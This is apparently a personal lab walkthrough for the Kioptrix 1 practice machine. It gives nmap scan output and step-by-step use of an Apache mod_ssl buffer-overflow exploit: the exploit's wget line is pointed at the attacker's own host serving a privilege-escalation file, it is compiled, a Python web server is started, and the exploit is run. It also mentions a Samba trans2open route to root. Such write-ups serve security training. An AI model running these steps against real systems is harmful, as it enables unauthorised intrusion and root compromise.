Kioptrix 1

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 10:21 PST Nmap scan report for 10.10.0.5 Host is up (0.0069s latency). Not shown: 994 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) |_sshv1: Server supports SSHv1 | ssh-hostkey: | 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1) | 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA) |_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-title: Test Page for the Apache Web Server on Red Hat Linux | http-methods: |_ Potentially risky methods: TRACE 111/tcp open rpcbind 2 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2 111/tcp rpcbind | 100000 2 111/udp rpcbind | 100024 1 32768/tcp status |_ 100024 1 32770/udp status 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b |_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=-- | Not valid before: 2009-09-26T09:32:06 |_Not valid after: 2010-09-26T09:32:06 |_ssl-date: 2022-01-23T15:22:09+00:00; -2h59m50s from scanner time. | sslv2: | SSLv2 supported | ciphers: | SSL2_RC4_128_WITH_MD5 | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 | SSL2_RC4_64_WITH_MD5 | SSL2_RC4_128_EXPORT40_WITH_MD5 | SSL2_RC2_128_CBC_WITH_MD5 | SSL2_DES_192_EDE3_CBC_WITH_MD5 |_ SSL2_DES_64_CBC_WITH_MD5 |_http-title: 400 Bad Request 32768/tcp open status 1 (RPC #100024) Host script results: |_clock-skew: -2h59m50s |_smb2-time: Protocol negotiation failed (SMB2) |_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 33.28 seconds

80/tcp open http Apache httpd 1.3.20 ((Unix) Apache 1.3.20 is vulnerable to an Buffer Overflow. I used the exploit in /usr/share/exploitdb/exploits/unix/remote/47080.c Due to the vulnerable nature of this machine I had to download the ptrace-kmod.c on kali and host it. https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c Downlaod the file Modify 47080.c before compiling. Basically you need to change the wget line to your kali vm ip. For example: http://10.10.0.1/Downloads/ptrace-kmod.c Compile with gcc -o 47080 47080.c -lcrypto Then put up your server: python3 -m http.server 80 (note that my kali vm was on the same network as the vuln machine) Now execute the script ./47080 0x6b ipaddress 443 It took a few tries before it finally worked You can also exploit this machine through smb. In our nmap scan we see that port 139 is open. Lets see what version is running. Running a quick search shows that this version is vulnerable to trans2open Run that and you will have root access.